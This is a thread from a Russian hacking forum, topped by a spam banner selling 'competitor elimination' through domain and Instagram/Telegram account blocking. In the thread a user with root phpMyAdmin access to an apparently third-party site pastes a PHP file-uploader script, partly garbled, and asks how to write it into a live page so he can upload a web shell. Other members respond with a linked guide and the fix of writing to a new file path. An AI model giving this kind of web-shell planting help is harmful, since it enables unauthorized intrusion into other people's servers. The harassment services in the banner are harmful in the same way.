УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Upoad shell wso через phphmyadmin

Опции темы

Поиск в этой теме

Опции просмотра

01.03.2014, 22:22

SGskam

Guest

Сообщений: n/a

Провел на форуме:
11396

Репутация: 0

http://yadi.sk/d/Ez4guzZ9JkuAy

вот ссылка на видео так сказать с наглядной проблемой

Значит непосредственно перейдём к проблеме

У меня есть доступ к phpmyadmin root пользователю

Я значит создаю новую базу, таблицу и вписываю туда такой код

ZaraByte File Uploader

setUploadLocation(getcwd().DIRECTORY_SEPARATOR);

$myUpload->uploadFile();

?>

uploadLocation = getcwd().DIRECTORY_SEPARATOR;

}

/**

* This function sets the directory where to upload the file

* In case of Windows server use the form: c:\\temp\\

* In case of Unix server use the form: /tmp/

*

* @param String Directory where to store the files

*/

function setUploadLocation($dir){

$this->uploadLocation = $dir;

}

function showUploadForm($msg='',$error=''){

?>

ZaraByte's File Uploader

'.$msg.'';

} else if ($error != ''){

echo ''.$error.'';

}

?>

File:

ZaraByte File Uploader

showUploadForm();

} else {

$msg = '';

$error = '';

//Check destination directory

if (!file_exists($this->uploadLocation)){

$error = "The target directory doesn't exists!";

} else if (!is_writeable($this->uploadLocation)) {

$error = "The target directory is not writeable!";

} else {

$target_path = $this->uploadLocation . basename( $_FILES['myfile']['name']);

if(@move_uploaded_file($_FILES['myfile']['tmp_name'], $target_path)) {

$msg = basename( $_FILES['myfile']['name']).

" was uploaded successfully!";

} else{

$error = "The upload process failed!";

}

}

$this->showUploadForm($msg,$error);

}

}

}

?>

на видео видно

и у меня не выполняется sql запрос с помошью которого из созданой мною таблицей с кодо, чтобы это всё дело добавилось к дырявой странице и я мог залить шелл

помогите решить проблему пожалста

01.03.2014, 23:19

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Отправить сообщение для Gorev с помощью ICQ

Отправить сообщение для Gorev с помощью Yahoo

https://rdot.org/forum/showthread.php?t=347

01.03.2014, 23:22

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Цитата:

Сообщение от qaz

qaz said:
можно вопрос, а нахрена пихать в запись колонки этот код?

Видео не смотрел, но судя по тому как он пытается через пыху шелл ливануть, его и не стоит смотреть

02.03.2014, 17:34

SGskam

Guest

Сообщений: n/a

Провел на форуме:
11396

Репутация: 0

#1086 - File '/var/www/siltd/units/base.php' already exists пишет при заливке мини-шелла

02.03.2014, 17:43

SGskam

Guest

Сообщений: n/a

Провел на форуме:
11396

Репутация: 0

прикол этого кода в том что если удастся его добавить к коду дырявой страницы

то есть http://www.хххххх.ru/units/base.php то там появится upload

для лучшего понятия ситуации советую посмотреть видео

13.03.2014, 21:36

totenkopf

Guest

Сообщений: n/a

Провел на форуме:
33658

Репутация: 19

Вы пытаетесь добавить код к существующему файлу?

Mysql такого не умеет.

Создавайте новый файл.

В тексте ошибки же написано "файл уже существует".

Попробуйте сохранить скажем в "/var/www/siltd/units/base2.php"

Если хватит прав все будет отлично.

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход